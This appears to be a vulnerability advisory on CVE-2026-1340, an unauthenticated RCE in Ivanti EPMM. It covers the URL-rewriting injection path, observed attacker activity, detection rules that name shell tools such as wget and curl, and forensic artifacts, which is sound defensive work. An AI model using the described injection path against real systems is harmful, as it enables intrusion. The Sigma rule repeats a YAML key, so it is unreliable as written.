CVE-2026-1340: Unauthenticated Remote Code Execution in Ivanti EPMM

The exploitation landscape for edge appliances has reached a critical tipping point. CVE-2026-1340, a code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM), represents a severe risk to enterprise infrastructure. Actively exploited in the wild, this RCE grants attackers full control over mobile device management (MDM) infrastructure without requiring authentication, user interaction, or valid credentials.

Danger

Executive Summary (TL;DR): CVE-2026-1340 is a critical RCE (CVSS 9.8) in Ivanti EPMM caused by improper code generation (CWE-94) in legacy bash scripts used for URL rewriting. The vulnerability is actively exploited by threat actors to deploy web shells, reverse shells, and cryptominers. Remediation: Patch immediately using version-specific RPMs.

Technical Analysis

The vulnerability originates from unsafe utilization of legacy bash scripts (/mi/bin/map-appstore-url and /mi/bin/map-aft-store-url) by the Apache web server. These scripts are intended to handle URL rewriting for In-House Application Distribution.

An attacker leverages bash arithmetic expansion to inject malicious commands into variables processed by these scripts. The injection flow follows this mechanism:

1. Input Manipulation: Sending crafted GET requests to endpoints starting with /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/.
2. Variable Injection: Passing a malicious command string into variables subsequently evaluated by bash arithmetic expansion (e.g., if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]).
3. Execution: The script resolves the injected string as a command, leading to RCE.

Exploitation Patterns (Unit 42 Analysis)

Threat actors are employing automated scanning frameworks to identify vulnerable instances, typically followed by these malicious operations:

• Reconnaissance: Verification of RCE via time-based responses (using sleep commands).
• Reverse Shells: Establishment of persistent outbound connections using ncat, sh, or bash.
• Web Shells: Installation of lightweight JSP web shells (e.g., 401.jsp, 403.jsp, 1.jsp) in /mi/tomcat/webapps/mifs/.
• Malware Deployment: Downloading secondary payloads, including cryptominers and the Nezha monitoring agent.

Detection Strategy

Sigma Detection

title: Ivanti EPMM RCE Attempt (CVE-2026-1340)
status: experimental
description: Detects exploitation attempts of CVE-2026-1340 targeting Ivanti EPMM
logsource:
  product: web
  category: web_server
detection:
  selection:
    uri|contains: ['/mifs/c/appstore/fob/', '/mifs/c/aftstore/fob/']
    uri|contains: 'gPath'
  condition: selection

Threat Hunting Query (Splunk)

index=web_logs product="Ivanti EPMM"
| search uri="/mifs/c/*/fob/*"
| where match(_raw, "gPath") OR match(_raw, "(?i)(bin/sh|cmd\.exe|wget|curl)")

Forensic Value

DFIR analysts must prioritize identifying unauthorized persistence. Key forensic artifacts include:

• Web Shells: Scan /mi/tomcat/webapps/mifs/ for JSP files with suspicious content.
• Process Artifacts: Monitor for unexpected child processes (/bin/sh, cmd.exe, curl, wget) spawned by the EPMM service.
• Log Analysis: Correlate anomalous access to /mifs/c/*/fob/* endpoints with subsequent host-based anomalies.

Sources

• NVD CVE-2026-1340
• CISA KEV Catalog
• Ivanti Security Advisory
• Unit 42 Threat Research